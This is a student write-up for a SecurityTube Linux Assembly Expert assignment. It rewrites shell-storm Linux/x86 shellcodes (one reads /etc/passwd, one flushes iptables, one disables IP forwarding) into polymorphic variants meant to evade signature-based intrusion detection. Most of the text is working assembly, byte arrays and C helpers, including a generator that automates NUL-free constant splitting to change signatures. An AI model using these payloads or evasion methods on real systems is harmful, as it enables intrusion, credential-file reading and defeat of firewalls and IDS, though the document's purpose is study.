SLAE Assignment 6 - Polymorphic Shellcodes
Objective
The objective of this assignment is to create polymorphic versions of existing, well-known shellcodes. Polymorphism is a way to evade signature-based intrusion detection systems: a polymorphic shellcode is produced by rewriting an existing shellcode at the assembly level so that its byte pattern changes while its original functionality is preserved.
Shellcode 1: http://shell-storm.org/shellcode/files/shellcode-842.php
Original author: Geyslan G. Bem, Hacking bits (Tiny Read File Shellcode)
The first step was to recover the assembly from the shellcode bytes; I used ndisasm to disassemble them.
As the screenshot above shows, the original author's code does its work with three system calls, open, read and write, and then exits. open (syscall 5) opens /etc/passwd, read (syscall 3) reads up to 4096 bytes (0xfff + 1) from it into a buffer on the stack, and write (syscall 4) prints what was read to stdout. The final xchg eax,ebx / int 0x80 leaves eax = 1, which is exit (syscall 1).
My aim was to change the assembly so that it differs from the code above and a signature-based IDS/IPS does not match it, even when the original shellcode's signature is in its database.
I made the following changes.
Original shellcode:

xor ecx,ecx
mul ecx                 ; eax = edx = 0
mov al,0x5              ; open
push ecx                ; NUL terminator
push dword 0x64777373   ; "sswd"
push dword 0x61702f63   ; "c/pa"
push dword 0x74652f2f   ; "//et"  -> esp points at "//etc/passwd"
mov ebx,esp
int 0x80                ; open("//etc/passwd", 0, 0)
xchg eax,ebx            ; ebx = fd
xchg eax,ecx            ; ecx = buffer (the stack), eax = 0
mov al,0x3              ; read
xor edx,edx
mov dx,0xfff
inc edx                 ; edx = 4096
int 0x80                ; read(fd, buf, 4096)
xchg eax,edx            ; edx = bytes read
xor eax,eax
mov al,0x4              ; write
mov bl,0x1              ; stdout
int 0x80                ; write(1, buf, edx)
xchg eax,ebx            ; eax = 1 = exit
int 0x80

Polymorphic shellcode:

xor ecx,ecx
mul ecx
stc                     ; no effect: nothing below reads the carry flag
mov al,0x4
inc al                  ; al = 5 (open), split across two instructions
clc
push ecx
mov edx, 0x53666262
add edx, 0x11111111     ; edx = 0x64777373 ("sswd")
push edx
push dword 0x61702f63   ; unchanged
xor edx,edx             ; no effect: overwritten by the next mov
mov edx, 0x85764040
sub edx, 0x11111111     ; edx = 0x74652f2f ("//et")
push edx
mov ebx,esp
int 0x80                ; open; the mode in edx is ignored without O_CREAT
xchg eax,ebx
xchg eax,ecx
mov al,0x4
dec al                  ; al = 3 (read)
xor edx,edx
mov dx,0xfff
inc edx
int 0x80
xchg eax,edx
xor eax,eax
mov al,0x4
mov bl,0x1
int 0x80
xchg eax,ebx
int 0x80
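To check the evasion claim without a real IDS, here is an added example (my own C, not the author's code) that scans both shellcodes for a fixed byte signature. The two byte arrays are hand-assembled from the listings above using nasm's 32-bit encodings; verify them with nasm -f bin and ndisasm -b32 rather than trusting the transcription. The signature itself is an assumption: a naive rule that matches the three consecutive push dword instructions spelling //etc/passwd. The example also checks that neither variant contains a NUL byte and that both issue the same number of int 0x80 system calls.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Original shellcode (shell-storm 842), hand-assembled from the first listing. */
static const uint8_t orig_sc[] = {
    0x31,0xc9, 0xf7,0xe1, 0xb0,0x05, 0x51,      /* xor ecx,ecx; mul ecx; mov al,5; push ecx */
    0x68,0x73,0x73,0x77,0x64,                   /* push dword 0x64777373  "sswd" */
    0x68,0x63,0x2f,0x70,0x61,                   /* push dword 0x61702f63  "c/pa" */
    0x68,0x2f,0x2f,0x65,0x74,                   /* push dword 0x74652f2f  "//et" */
    0x89,0xe3, 0xcd,0x80,                       /* mov ebx,esp; int 0x80 (open) */
    0x93, 0x91, 0xb0,0x03, 0x31,0xd2,           /* xchg eax,ebx; xchg eax,ecx; mov al,3; xor edx,edx */
    0x66,0xba,0xff,0x0f, 0x42, 0xcd,0x80,       /* mov dx,0xfff; inc edx; int 0x80 (read) */
    0x92, 0x31,0xc0, 0xb0,0x04, 0xb3,0x01,      /* xchg eax,edx; xor eax,eax; mov al,4; mov bl,1 */
    0xcd,0x80, 0x93, 0xcd,0x80,                 /* int 0x80 (write); xchg eax,ebx; int 0x80 (exit) */
};

/* Polymorphic variant, hand-assembled from the second listing. */
static const uint8_t poly_sc[] = {
    0x31,0xc9, 0xf7,0xe1, 0xf9, 0xb0,0x04, 0xfe,0xc0, 0xf8, 0x51, /* ...; stc; mov al,4; inc al; clc; push ecx */
    0xba,0x62,0x62,0x66,0x53,                   /* mov edx,0x53666262 */
    0x81,0xc2,0x11,0x11,0x11,0x11,              /* add edx,0x11111111 -> 0x64777373 */
    0x52,                                       /* push edx */
    0x68,0x63,0x2f,0x70,0x61,                   /* push dword 0x61702f63 (kept as-is) */
    0x31,0xd2, 0xba,0x40,0x40,0x76,0x85,        /* xor edx,edx; mov edx,0x85764040 */
    0x81,0xea,0x11,0x11,0x11,0x11,              /* sub edx,0x11111111 -> 0x74652f2f */
    0x52, 0x89,0xe3, 0xcd,0x80,                 /* push edx; mov ebx,esp; int 0x80 (open) */
    0x93, 0x91, 0xb0,0x04, 0xfe,0xc8, 0x31,0xd2, /* xchg; xchg; mov al,4; dec al; xor edx,edx */
    0x66,0xba,0xff,0x0f, 0x42, 0xcd,0x80,       /* mov dx,0xfff; inc edx; int 0x80 (read) */
    0x92, 0x31,0xc0, 0xb0,0x04, 0xb3,0x01,      /* identical tail from here on */
    0xcd,0x80, 0x93, 0xcd,0x80,
};

/* Assumed IDS rule: the three push dword instructions that spell //etc/passwd. */
static const uint8_t sig_passwd_pushes[] = {
    0x68,0x73,0x73,0x77,0x64, 0x68,0x63,0x2f,0x70,0x61, 0x68,0x2f,0x2f,0x65,0x74,
};

/* Offset of the first occurrence of sig in buf, or -1 if absent (plain byte scan). */
int find_sig(const uint8_t *buf, size_t n, const uint8_t *sig, size_t m) {
    for (size_t i = 0; m <= n && i + m <= n; i++) {
        size_t k = 0;
        while (k < m && buf[i + k] == sig[k]) k++;
        if (k == m) return (int)i;
    }
    return -1;
}

/* Count "cd 80" pairs: both variants should make the same number of system calls. */
int count_int80(const uint8_t *buf, size_t n) {
    int c = 0;
    for (size_t i = 0; i + 1 < n; i++)
        if (buf[i] == 0xcd && buf[i + 1] == 0x80) c++;
    return c;
}

/* 1 if any byte is 0x00: a NUL truncates shellcode delivered through string functions. */
int has_nul(const uint8_t *buf, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (buf[i] == 0) return 1;
    return 0;
}

/* Named wrappers so each result is reachable by name. */
size_t orig_len(void) { return sizeof orig_sc; }
size_t poly_len(void) { return sizeof poly_sc; }
int sig_in_orig(void) { return find_sig(orig_sc, sizeof orig_sc, sig_passwd_pushes, sizeof sig_passwd_pushes); }
int sig_in_poly(void) { return find_sig(poly_sc, sizeof poly_sc, sig_passwd_pushes, sizeof sig_passwd_pushes); }
int syscalls_orig(void) { return count_int80(orig_sc, sizeof orig_sc); }
int syscalls_poly(void) { return count_int80(poly_sc, sizeof poly_sc); }
int nul_in_orig(void) { return has_nul(orig_sc, sizeof orig_sc); }
int nul_in_poly(void) { return has_nul(poly_sc, sizeof poly_sc); }

int main(void) {
    printf("original:    %zu bytes, signature at %d, %d syscalls, NUL=%d\n",
           orig_len(), sig_in_orig(), syscalls_orig(), nul_in_orig());
    printf("polymorphic: %zu bytes, signature at %d, %d syscalls, NUL=%d\n",
           poly_len(), sig_in_poly(), syscalls_poly(), nul_in_poly());
    return 0;
}
```

The scan finds the push sequence at offset 7 in the original and nowhere in the variant, which is the whole point. The caveat is visible in the arrays: from push dword 0x61702f63 onward the two are almost byte-identical, and the read/write tail (66 ba ff 0f 42 cd 80 ... b3 01 cd 80) is untouched, so a rule written on that tail would still match. Check what the signature you are evading actually covers before declaring success.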
We learned in the SLAE course that most assembly logic can be expressed in more than one form, and I used several of the techniques from the course to write the same logic differently. The main ones were the following.

Using arithmetic to load the same value in a different way. For example, push 0x33333333 can also be written as

mov ebx, 0x22222222
add ebx, 0x11111111
push ebx

The two halves must be chosen so that neither contains a 0x00 byte (which would truncate the shellcode), and the scratch register must be free at that point: above, edx is clobbered before the open call, which is harmless because open ignores its mode argument in edx unless O_CREAT is given. Small constants can be split the same way, which is why the variant uses mov al,0x4 / inc al instead of mov al,0x5.

Inserting instructions that have no effect on the result. For example stc (set carry flag) and clc (clear carry flag) add randomness to the code; nothing in this shellcode consumes the carry flag (there is no adc, sbb or rotate-through-carry instruction), so they do not change its execution.
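For the arithmetic technique above, here is an added C example of my own (not from the post) that automates the split: given the 32-bit value a push would load, it picks a random pair that adds (or subtracts) back to it, rejecting any candidate containing a 0x00 byte, and it also verifies the pairs used in the listing above (0x53666262 + 0x11111111 and 0x85764040 - 0x11111111). It goes a little beyond the post: the same split also lets you load a dword that itself contains NUL bytes, which a plain push imm32 cannot do in NUL-free shellcode. The xorshift generator and the seeds are assumptions of the example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* True if any of the four bytes of v is 0x00 (a NUL would truncate the shellcode). */
bool has_zero_byte(uint32_t v) {
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xffu) == 0) return true;
    return false;
}

/* xorshift32 (assumed generator): deterministic per seed, so a build is reproducible;
 * change the seed to get a different variant of the same shellcode. */
static uint32_t xorshift32(uint32_t *state) {
    uint32_t x = *state;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return *state = x;
}

/* Pick a, b with a + b == target (mod 2^32), neither half containing 0x00.
 * Emit   mov reg,a / add reg,b / push reg   in place of   push target.
 * Returns the number of candidates tried, or 0 if none qualified. */
int split_add(uint32_t target, uint32_t seed, uint32_t *a, uint32_t *b) {
    uint32_t st = seed ? seed : 0x9e3779b9u;   /* xorshift must not start at 0 */
    for (int tries = 1; tries <= 256; tries++) {
        uint32_t x = xorshift32(&st);
        uint32_t y = target - x;               /* unsigned wrap == 32-bit add wrap */
        if (!has_zero_byte(x) && !has_zero_byte(y)) { *a = x; *b = y; return tries; }
    }
    return 0;
}

/* Same idea with subtraction, as the second push in the listing uses: a - b == target. */
int split_sub(uint32_t target, uint32_t seed, uint32_t *a, uint32_t *b) {
    uint32_t st = seed ? seed : 0x9e3779b9u;
    for (int tries = 1; tries <= 256; tries++) {
        uint32_t y = xorshift32(&st);
        uint32_t x = target + y;
        if (!has_zero_byte(x) && !has_zero_byte(y)) { *a = x; *b = y; return tries; }
    }
    return 0;
}

/* Verify a hand-picked pair: the arithmetic matches and neither half has a NUL. */
bool add_pair_ok(uint32_t a, uint32_t b, uint32_t target) {
    return (uint32_t)(a + b) == target && !has_zero_byte(a) && !has_zero_byte(b);
}
bool sub_pair_ok(uint32_t a, uint32_t b, uint32_t target) {
    return (uint32_t)(a - b) == target && !has_zero_byte(a) && !has_zero_byte(b);
}

/* Split and re-check in one call: true when a usable NUL-free pair was found. */
bool split_add_roundtrip(uint32_t target, uint32_t seed) {
    uint32_t a, b;
    return split_add(target, seed, &a, &b) > 0 && add_pair_ok(a, b, target);
}
bool split_sub_roundtrip(uint32_t target, uint32_t seed) {
    uint32_t a, b;
    return split_sub(target, seed, &a, &b) > 0 && sub_pair_ok(a, b, target);
}

int main(void) {
    /* "sswd", "//et", and a word that contains NULs and so could never be pushed directly */
    const uint32_t words[] = { 0x64777373u, 0x74652f2fu, 0x00000a0du };
    for (size_t i = 0; i < sizeof words / sizeof words[0]; i++) {
        uint32_t a, b;
        if (split_add(words[i], 0x1234u + (uint32_t)i, &a, &b))
            printf("push 0x%08x  ->  mov edx,0x%08x ; add edx,0x%08x ; push edx\n", words[i], a, b);
    }
    return 0;
}
```

Each accepted candidate costs 11 bytes (mov r32,imm32 is 5, add r32,imm32 is 6) plus the push, against 5 for the literal push, which is what pushes shellcode 1 from 51 to 73 bytes; keep that in mind against the 150% cutoff.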
Execution
Now it is time to execute the polymorphic code and see whether it works. As usual, we assemble and link the code and extract the opcodes for the shellcode.
As you can see, it was a success. The shellcode length is 73 bytes, under our cutoff of 150% of the original (the original assembles to 51 bytes, so the limit is 76).
Shellcode 2: http://shell-storm.org/shellcode/files/shellcode-361.php
Original author: /rootteam/dev0id (www.sysworld.net), 58 bytes

jmp short callme
main:
pop esi                     ; esi -> '/sbin/iptables#-F#'
xor eax,eax
mov byte [esi+14],al        ; '#' after "/sbin/iptables" -> NUL
mov byte [esi+17],al        ; '#' after "-F" -> NUL
mov dword [esi+18],esi      ; argv[0] = "/sbin/iptables"  (nasm syntax: dword; the shell-storm listing writes long)
lea ebx,[esi+15]
mov dword [esi+22],ebx      ; argv[1] = "-F"
mov dword [esi+26],eax      ; argv[2] = NULL
mov al,0x0b                 ; execve
mov ebx,esi                 ; path
lea ecx,[esi+18]            ; argv
lea edx,[esi+26]            ; envp (NULL)
int 0x80
callme:
call main
db '/sbin/iptables#-F#'
Shellcode usage: the shellcode above flushes the iptables firewall rules. iptables is the traditional packet-filtering front end on Linux. Note that iptables -F with no -t option flushes only the rules in the filter table (not nat or mangle) and leaves each chain's default policy in place, so a chain whose policy is DROP still drops after the flush. iptables also needs root, so the shellcode only achieves anything when it runs with root privileges.
I rewrote the nasm file as follows. Instead of the jmp/call/pop trick, which patches the '#' bytes in place and writes the argv array past the end of the string (so the original only works from memory that is writable and has 12 spare bytes after it), both strings and the argv array are built on the stack, and the first dword of the path is produced with an add instead of a push of the literal value.
global _start
_start:
xor eax,eax
push eax                    ; NUL terminator
push dword 0x73656c62       ; "bles"
push dword 0x61747069       ; "ipta"
push dword 0x2f6e6962       ; "bin/"
mov edx, 0x11111111
add edx, 0x621e1e1e         ; edx = 0x732f2f2f = "///s"
push edx                    ; esp -> "///sbin/iptables"
mov ebx, esp                ; ebx = path
push eax
push word 0x462d            ; "-F"
mov esi, esp                ; esi -> "-F"
push eax                    ; argv[2] = NULL
push esi                    ; argv[1]
push ebx                    ; argv[0]
mov ecx,esp                 ; ecx = argv
mov edx,eax                 ; envp = NULL
mov al,0xa
inc al                      ; eax = 11 = execve
int 0x80
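Stack-built strings are easy to get wrong by one byte or one push in the wrong order, so here is an added example (my own C, not the post's code) that simulates the pushes from the listing above and shows the strings execve will actually receive; the little-endian layout it models is exactly what the CPU does on push. It also decodes the three pushes of shellcode 1, so one helper covers both stack strings on this page. The sim_stack model and its 0xaa fill are assumptions of the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A tiny model of the x86 stack: bytes grow downward from the top of mem. */
#define SIM_STACK 128
typedef struct { uint8_t mem[SIM_STACK]; size_t esp; } sim_stack;

/* 0xaa is "garbage" so a missing terminator shows up instead of silently working. */
void sim_init(sim_stack *s) { memset(s->mem, 0xaa, sizeof s->mem); s->esp = SIM_STACK; }

/* push dword: esp -= 4, bytes stored little-endian, least significant byte lowest. */
void push32(sim_stack *s, uint32_t v) {
    s->esp -= 4;
    for (int i = 0; i < 4; i++) s->mem[s->esp + i] = (uint8_t)(v >> (8 * i));
}

/* push word (66 68 imm16): esp -= 2. */
void push16(sim_stack *s, uint16_t v) {
    s->esp -= 2;
    s->mem[s->esp] = (uint8_t)v;
    s->mem[s->esp + 1] = (uint8_t)(v >> 8);
}

/* The C string the kernel will read from esp, i.e. what mov ebx,esp hands to execve. */
const char *at_esp(const sim_stack *s) { return (const char *)&s->mem[s->esp]; }

/* Reproduce the rewritten shellcode's pushes; returns argv[0], the path. */
const char *build_path(sim_stack *s) {
    push32(s, 0);                            /* push eax: NUL terminator */
    push32(s, 0x73656c62u);                  /* "bles" */
    push32(s, 0x61747069u);                  /* "ipta" */
    push32(s, 0x2f6e6962u);                  /* "bin/" */
    push32(s, 0x11111111u + 0x621e1e1eu);    /* mov edx / add edx / push edx: "///s" */
    return at_esp(s);                        /* mov ebx,esp */
}

/* argv[1]: push eax ; push word 0x462d. */
const char *build_flag(sim_stack *s) {
    push32(s, 0);
    push16(s, 0x462du);
    return at_esp(s);                        /* mov esi,esp */
}

/* General form: decode any push-dword sequence (given in push order) into the string at esp. */
const char *decode_pushes(sim_stack *s, const uint32_t *words, size_t n) {
    push32(s, 0);
    for (size_t i = 0; i < n; i++) push32(s, words[i]);
    return at_esp(s);
}

/* Self-checks: build on a fresh stack and compare with the expected string. */
int path_matches(const char *expect) {
    sim_stack s; sim_init(&s);
    return strcmp(build_path(&s), expect) == 0;
}
int flag_matches(const char *expect) {
    sim_stack s; sim_init(&s);
    build_path(&s);                          /* same order as the shellcode */
    return strcmp(build_flag(&s), expect) == 0;
}
int passwd_path_matches(const char *expect) {
    sim_stack s; sim_init(&s);
    const uint32_t words[] = { 0x64777373u, 0x61702f63u, 0x74652f2fu };  /* shellcode 1 */
    return strcmp(decode_pushes(&s, words, 3), expect) == 0;
}

int main(void) {
    sim_stack s; sim_init(&s);
    const char *path = build_path(&s);
    const char *flag = build_flag(&s);
    printf("execve(\"%s\", [\"%s\", \"%s\", NULL], NULL)\n", path, path, flag);
    sim_stack t; sim_init(&t);
    const uint32_t passwd[] = { 0x64777373u, 0x61702f63u, 0x74652f2fu };
    printf("shellcode 1 opens \"%s\"\n", decode_pushes(&t, passwd, 3));
    return 0;
}
```

The leading "///" in the path is harmless (the kernel collapses repeated slashes) and is what lets the first dword be built with no NUL byte. After the two strings, the listing pushes 0, esi and ebx, so ecx = esp points at a NULL-terminated argv with the path pointer first; the only way to see the exact layout on a real run is to break on int 0x80 in gdb and dump the stack.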
Now we execute the shellcode and check the outcome.
The shellcode ran successfully and the rules were flushed, which can be confirmed by comparing the output of iptables -L before and after. Because execve replaces the process, there is no exit call: the shellcode never returns. The total length is 52 bytes, less than the original 58-byte shellcode.
Shellcode 3: http://shell-storm.org/shellcode/files/shellcode-848.php
Original author: Hamid Zamani
Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit(). Size: 83 bytes.
See below the shellcode in Intel syntax.
IP forwarding lets the kernel pass packets received on one interface out through another; in essence this is what makes a Linux host act as a router. Writing 0 to /proc/sys/net/ipv4/ip_forward turns it off.
Let's modify the shellcode.
I made some changes; the two shellcodes are shown side by side.
Now let's execute the shellcode and look at the output.
As the picture above shows, the value in the file has changed from 1 to 0.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE – 739